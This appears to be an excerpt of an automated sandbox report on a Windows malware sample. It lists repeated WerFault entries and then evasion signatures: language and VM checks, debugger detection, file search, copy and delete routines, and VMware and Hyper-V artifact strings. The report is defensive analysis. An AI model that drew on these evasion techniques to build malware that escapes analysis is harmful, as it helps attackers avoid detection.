                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Source: C:\Users\user\Desktop\mJXdkcP4Wx.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-26388
                    Source: C:\Users\user\Desktop\mJXdkcP4Wx.exeEvaded block: after key decisiongraph_0-27549
                    Source: C:\Users\user\Desktop\mJXdkcP4Wx.exeAPI coverage: 6.5 %
                    Source: C:\Users\user\Desktop\mJXdkcP4Wx.exeCode function: 0_2_0040E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0040E430
                    Source: C:\Users\user\Desktop\mJXdkcP4Wx.exeCode function: 0_2_004138B0 wsprintfA,FindFirstFileA,lstrcatA,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcatA,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_004138B0
                    Source: C:\Users\user\Desktop\mJXdkcP4Wx.exeCode function: 0_2_00414570 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,0_2_00414570
                    Source: C:\Users\user\Desktop\mJXdkcP4Wx.exeCode function: 0_2_00414910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00414910
                    Source: C:\Users\user\Desktop\mJXdkcP4Wx.exeCode function: 0_2_0040ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0040ED20
                    Source: C:\Users\user\Desktop\mJXdkcP4Wx.exeCode function: 0_2_0040BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0040BE70
                    Source: C:\Users\user\Desktop\mJXdkcP4Wx.exeCode function: 0_2_0040DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0040DE10
                    Source: C:\Users\user\Desktop\mJXdkcP4Wx.exeCode function: 0_2_004016D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_004016D0
                    Source: C:\Users\user\Desktop\mJXdkcP4Wx.exeCode function: 0_2_0040DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0040DA80
                    Source: C:\Users\user\Desktop\mJXdkcP4Wx.exeCode function: 0_2_00413EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,0_2_00413EA0
                    Source: C:\Users\user\Desktop\mJXdkcP4Wx.exeCode function: 0_2_0040F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0040F6B0
                    Source: C:\Users\user\Desktop\mJXdkcP4Wx.exeCode function: 0_2_022CE697 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_022CE697
                    Source: C:\Users\user\Desktop\mJXdkcP4Wx.exeCode function: 0_2_022D3B17 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_022D3B17
                    Source: C:\Users\user\Desktop\mJXdkcP4Wx.exeCode function: 0_2_022D4B77 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_022D4B77
                    Source: C:\Users\user\Desktop\mJXdkcP4Wx.exeCode function: 0_2_022CEF87 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_022CEF87
                    Source: C:\Users\user\Desktop\mJXdkcP4Wx.exeCode function: 0_2_022D47D7 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_022D47D7
                    Source: C:\Users\user\Desktop\mJXdkcP4Wx.exeCode function: 0_2_022CE077 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_022CE077
                    Source: C:\Users\user\Desktop\mJXdkcP4Wx.exeCode function: 0_2_022CDCE7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_022CDCE7
                    Source: C:\Users\user\Desktop\mJXdkcP4Wx.exeCode function: 0_2_022CF8F1 FindFirstFileA,0_2_022CF8F1
                    Source: C:\Users\user\Desktop\mJXdkcP4Wx.exeCode function: 0_2_022CC0D7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_022CC0D7
                    Source: C:\Users\user\Desktop\mJXdkcP4Wx.exeCode function: 0_2_022C1937 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_022C1937
                    Source: C:\Users\user\Desktop\mJXdkcP4Wx.exeCode function: 0_2_022D4107 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_022D4107
                    Source: C:\Users\user\Desktop\mJXdkcP4Wx.exeCode function: 0_2_022CF917 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_022CF917
                    Source: C:\Users\user\Desktop\mJXdkcP4Wx.exeCode function: 0_2_00401160 GetSystemInfo,ExitProcess,0_2_00401160
                    Source: Amcache.hve.4.drBinary or memory string: VMware
                    Source: Amcache.hve.4.drBinary or memory string: VMware Virtual USB Mouse
                    Source: Amcache.hve.4.drBinary or memory string: vmci.syshbin
                    Source: Amcache.hve.4.drBinary or memory string: VMware, Inc.
                    Source: Amcache.hve.4.drBinary or memory string: VMware20,1hbin@
                    Source: Amcache.hve.4.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                    Source: Amcache.hve.4.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                    Source: Amcache.hve.4.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                    Source: mJXdkcP4Wx.exe, 00000000.00000002.2338388103.00000000007C1000.00000004.00000020.00020000.00000000.sdmp, mJXdkcP4Wx.exe, 00000000.00000002.2338388103.0000000000810000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: Amcache.hve.4.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                    Source: Amcache.hve.4.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                    Source: Amcache.hve.4.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                    Source: mJXdkcP4Wx.exe, 00000000.00000002.2338357081.0000000000769000.00000040.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware(
                    Source: Amcache.hve.4.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                    Source: Amcache.hve.4.drBinary or memory string: vmci.sys
                    Source: Amcache.hve.4.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                    Source: Amcache.hve.4.drBinary or memory string: vmci.syshbin`
                    Source: Amcache.hve.4.drBinary or memory string: \driver\vmci,\driver\pci
                    Source: Amcache.hve.4.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                    Source: Amcache.hve.4.drBinary or memory string: VMware20,1
                    Source: Amcache.hve.4.drBinary or memory string: Microsoft Hyper-V Generation Counter
                    Source: Amcache.hve.4.drBinary or memory string: NECVMWar VMware SATA CD00
                    Source: Amcache.hve.4.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                    Source: mJXdkcP4Wx.exe, 00000000.00000002.2338357081.0000000000769000.00000040.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                    Source: Amcache.hve.4.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                    Source: Amcache.hve.4.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                    Source: Amcache.hve.4.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                    Source: Amcache.hve.4.drBinary or memory string: VMware PCI VMCI Bus Device
                    Source: Amcache.hve.4.drBinary or memory string: VMware VMCI Bus Device
                    Source: Amcache.hve.4.drBinary or memory string: VMware Virtual RAM
                    Source: Amcache.hve.4.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                    Source: Amcache.hve.4.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                    Source: C:\Users\user\Desktop\mJXdkcP4Wx.exeAPI call chain: ExitProcess graph end nodegraph_0-26373
                    Source: C:\Users\user\Desktop\mJXdkcP4Wx.exeAPI call chain: ExitProcess graph end nodegraph_0-26261
                    Source: C:\Users\user\Desktop\mJXdkcP4Wx.exeAPI call chain: ExitProcess graph end nodegraph_0-26376
                    Source: C:\Users\user\Desktop\mJXdkcP4Wx.exeAPI call chain: ExitProcess graph end nodegraph_0-26416
                    Source: C:\Users\user\Desktop\mJXdkcP4Wx.exeAPI call chain: ExitProcess graph end nodegraph_0-26395
                    Source: C:\Users\user\Desktop\mJXdkcP4Wx.exeAPI call chain: ExitProcess graph end nodegraph_0-27802
                    Source: C:\Users\user\Desktop\mJXdkcP4Wx.exeAPI call chain: ExitProcess graph end nodegraph_0-26387
                    Source: C:\Users\user\Desktop\mJXdkcP4Wx.exeAPI call chain: ExitProcess graph end nodegraph_0-26215
                    Source: C:\Users\user\Desktop\mJXdkcP4Wx.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\Desktop\mJXdkcP4Wx.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\Desktop\mJXdkcP4Wx.exeCode function: 0_2_004045C0 lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,GetProcessHeap,RtlAllocateHeap,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,LdrInitializeThunk,lstrlenA,strlen,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,VirtualProtect,0_2_004045C0
                    Source: C:\Users\user\Desktop\mJXdkcP4Wx.exeCode function: 0_2_0041AD48 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0041AD48
                    Source: C:\Users\user\Desktop\mJXdkcP4Wx.exeCode function: 0_2_004045C0 VirtualProtect ?,00000004,00000100,000000000_2_004045C0
                    Source: C:\Users\user\Desktop\mJXdkcP4Wx.exeCode function: 0_2_00419860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00419860
                    Source: C:\Users\user\Desktop\mJXdkcP4Wx.exeCode function: 0_2_00419750 mov eax, dword ptr fs:[00000030h]0_2_00419750
                    Source: C:\Users\user\Desktop\mJXdkcP4Wx.exeCode function: 0_2_007698AB push dword ptr fs:[00000030h]0_2_007698AB
                    Source: C:\Users\user\Desktop\mJXdkcP4Wx.exeCode function: 0_2_022C092B mov eax, dword ptr fs:[00000030h]0_2_022C092B
                    Source: C:\Users\user\Desktop\mJXdkcP4Wx.exeCode function: 0_2_022D99B7 mov eax, dword ptr fs:[00000030h]0_2_022D99B7
                    Source: C:\Users\user\Desktop\mJXdkcP4Wx.exeCode function: 0_2_022C0D90 mov eax, dword ptr fs:[00000030h]0_2_022C0D90
                    Source: C:\Users\user\Desktop\mJXdkcP4Wx.exeCode function: 0_2_00417850 GetProcessHeap,HeapAlloc,GetUserNameA,0_2_00417850
                    Source: C:\Users\user\Desktop\mJXdkcP4Wx.exeCode function: 0_2_0041AD48 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0041AD48
                    Source: C:\Users\user\Desktop\mJXdkcP4Wx.exeCode function: 0_2_0041CEEA SetUnhandledExceptionFilter,0_2_0041CEEA
                    Source: C:\Users\user\Desktop\mJXdkcP4Wx.exeCode function: 0_2_0041B33A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0041B33A
                    Source: C:\Users\user\Desktop\mJXdkcP4Wx.exeCode function: 0_2_022DAFAF memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_022DAFAF
                    Source: C:\Users\user\Desktop\mJXdkcP4Wx.exeCode function: 0_2_022DD151 SetUnhandledExceptionFilter,0_2_022DD151
